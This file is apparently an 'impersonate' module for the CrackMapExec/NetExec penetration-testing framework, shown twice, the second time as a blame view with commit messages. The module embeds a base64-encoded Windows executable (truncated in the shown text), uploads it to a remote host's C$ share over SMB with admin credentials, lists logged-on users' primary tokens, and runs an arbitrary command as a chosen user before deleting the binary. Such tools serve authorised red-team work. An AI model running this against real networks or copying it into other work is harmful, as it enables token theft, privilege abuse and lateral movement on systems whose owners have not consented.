NetExec/cme/modules/impersonate.py

# Impersonate module for CME 
# Author of the module : https://twitter.com/Defte_
# Impersonate: [ REPO TO ADD ]
# Token manipulation internals blog post [ LINK ]

from base64 import b64decode
from sys import exit
from os import path

class CMEModule:

    name = "impersonate"
    description = "List and impersonate tokens to run command as locally logged on users"
    supported_protocols = ["smb"]
    opsec_safe = True # could be flagged
    multiple_hosts = True

    def options(self, context, module_options):
        '''
            TOKEN     // Token id to usurp
            EXEC      // Command to exec
            IMP_EXE   // Path to the Impersonate binary on your local computer
        '''

        self.tmp_dir = "C:\\Windows\\Temp\\"
        self.share = "C$"
        self.tmp_share = self.tmp_dir.split(":")[1]
        self.impersonate = "Impersonate.exe"
        self.useembeded = True
        self.token = self.cmd = ""
        self.impersonate_embedded = b64decode('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

        if "EXEC" in module_options:
            self.cmd = module_options["EXEC"]

        if "TOKEN" in module_options:
            self.token = module_options["TOKEN"]

        if "IMP_EXE" in module_options:
            self.imp_exe = module_options["IMP_EXE"]
            self.useembeded = False

    def list_available_primary_tokens(self, _, connection):
        command = f"{self.tmp_dir}Impersonate.exe list"
        return connection.execute(command, True)
        
    def on_admin_login(self, context, connection):

        if self.useembeded:
            file_to_upload = "/tmp/Impersonate.exe"
            with open(file_to_upload, 'wb') as impersonate:
                impersonate.write(self.impersonate_embedded)
        else:
            if path.isfile(self.imp_exe):
                file_to_upload = self.imp_exe
            else:
                context.log.error(f"Cannot open {self.imp_exe}")
                exit(1)

        context.log.info(f"Uploading {self.impersonate}")
        with open(file_to_upload, 'rb') as impersonate:
            try:
                connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)
                context.log.success(f"Impersonate binary successfully uploaded")
            except Exception as e:
                context.log.error(f"Error writing file to share {self.tmp_share}: {e}")
                return

        try:
            if self.cmd == "" or self.token == "":
                context.log.info(f"Listing available primary tokens")
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token, token_owner = line.split(" ", 1)
                    context.log.highlight(f"Primary token ID: {token} {token_owner}")
            else:
                impersonated_user = ""
                p = self.list_available_primary_tokens(context, connection)
                for line in p.splitlines():
                    token_id, token_owner = line.split(" ", 1)
                    if token_id == self.token:
                        impersonated_user = token_owner.strip()
                        break

                if impersonated_user:  
                    context.log.info(f"Executing {self.cmd} as {impersonated_user}")
                    command = f"{self.tmp_dir}Impersonate.exe exec {self.token} \"{self.cmd}\""
                    for line in connection.execute(command, True, methods=["smbexec"]).splitlines():
                        context.log.highlight(line)
                else:
                    context.log.error(f"Invalid token ID submitted")

        except Exception as e:
            context.log.error(f"Error runing command: {e}")
        finally:
            try:
                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")
                context.log.success(f"Impersonate binary successfully deleted")
            except Exception as e:
                context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")
Update impersonate.py I'll add technical links to the blog post explaining token manipulation internals as well as the source code of the original binary when the blog post will be released (should be on monday) 2022-10-29 09:55:34 +00:00			`# Impersonate module for CME`
			`# Author of the module : https://twitter.com/Defte_`
			`# Impersonate: [ REPO TO ADD ]`
			`# Token manipulation internals blog post [ LINK ]`

Final update! 2022-10-27 10:21:46 +00:00			`from base64 import b64decode`
Refactor options 2022-10-27 19:32:55 +00:00			`from sys import exit`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`from os import path`
Add files via upload 2022-07-04 12:44:35 +00:00
			`class CMEModule:`

			`name = "impersonate"`
			`description = "List and impersonate tokens to run command as locally logged on users"`
			`supported_protocols = ["smb"]`
			`opsec_safe = True # could be flagged`
			`multiple_hosts = True`

			`def options(self, context, module_options):`
			`'''`
Final update! 2022-10-27 10:21:46 +00:00			`TOKEN // Token id to usurp`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`EXEC // Command to exec`
			`IMP_EXE // Path to the Impersonate binary on your local computer`
Add files via upload 2022-07-04 12:44:35 +00:00			`'''`

			`self.tmp_dir = "C:\\Windows\\Temp\\"`
			`self.share = "C$"`
			`self.tmp_share = self.tmp_dir.split(":")[1]`
			`self.impersonate = "Impersonate.exe"`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`self.useembeded = True`
Refactor options 2022-10-27 19:32:55 +00:00			`self.token = self.cmd = ""`
update impersonate binary 2022-11-02 11:23:07 +00:00			self.impersonate_embedded = b64decode('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
Add files via upload 2022-07-04 12:44:35 +00:00
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "EXEC" in module_options:`
			`self.cmd = module_options["EXEC"]`
Refactor options 2022-10-27 19:32:55 +00:00
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if "TOKEN" in module_options:`
			`self.token = module_options["TOKEN"]`

			`if "IMP_EXE" in module_options:`
			`self.imp_exe = module_options["IMP_EXE"]`
			`self.useembeded = False`
Add files via upload 2022-07-04 12:44:35 +00:00
Update impersonate.py 2022-07-09 16:34:35 +00:00			`def list_available_primary_tokens(self, _, connection):`
Final update! 2022-10-27 10:21:46 +00:00			`command = f"{self.tmp_dir}Impersonate.exe list"`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`return connection.execute(command, True)`

Add files via upload 2022-07-04 12:44:35 +00:00			`def on_admin_login(self, context, connection):`

Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`if self.useembeded:`
			`file_to_upload = "/tmp/Impersonate.exe"`
			`with open(file_to_upload, 'wb') as impersonate:`
			`impersonate.write(self.impersonate_embedded)`
			`else:`
			`if path.isfile(self.imp_exe):`
			`file_to_upload = self.imp_exe`
			`else:`
			`context.log.error(f"Cannot open {self.imp_exe}")`
			`exit(1)`
Add files via upload 2022-07-04 12:44:35 +00:00
			`context.log.info(f"Uploading {self.impersonate}")`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`with open(file_to_upload, 'rb') as impersonate:`
Add files via upload 2022-07-04 12:44:35 +00:00			`try:`
			`connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.success(f"Impersonate binary successfully uploaded")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error writing file to share {self.tmp_share}: {e}")`
			`return`

			`try:`
Refactor options 2022-10-27 19:32:55 +00:00			`if self.cmd == "" or self.token == "":`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`context.log.info(f"Listing available primary tokens")`
			`p = self.list_available_primary_tokens(context, connection)`
Add files via upload 2022-07-04 12:44:35 +00:00			`for line in p.splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`token, token_owner = line.split(" ", 1)`
			`context.log.highlight(f"Primary token ID: {token} {token_owner}")`
Add files via upload 2022-07-04 12:44:35 +00:00			`else:`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`impersonated_user = ""`
			`p = self.list_available_primary_tokens(context, connection)`
			`for line in p.splitlines():`
			`token_id, token_owner = line.split(" ", 1)`
Final update! 2022-10-27 10:21:46 +00:00			`if token_id == self.token:`
			`impersonated_user = token_owner.strip()`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`break`
Final update! 2022-10-27 10:21:46 +00:00
			`if impersonated_user:`
Refactor options 2022-10-27 19:32:55 +00:00			`context.log.info(f"Executing {self.cmd} as {impersonated_user}")`
			`command = f"{self.tmp_dir}Impersonate.exe exec {self.token} \"{self.cmd}\""`
Addind the IMP_EXE option Guess this will be the final one :P 2022-10-29 09:52:48 +00:00			`for line in connection.execute(command, True, methods=["smbexec"]).splitlines():`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.highlight(line)`
Update impersonate.py 2022-07-09 16:34:35 +00:00			`else:`
			`context.log.error(f"Invalid token ID submitted")`

Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
			`context.log.error(f"Error runing command: {e}")`
			`finally:`
			`try:`
			`connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}")`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.success(f"Impersonate binary successfully deleted")`
Add files via upload 2022-07-04 12:44:35 +00:00			`except Exception as e:`
Final update! 2022-10-27 10:21:46 +00:00			`context.log.error(f"Error deleting Impersonate.exe on {self.share}: {e}")`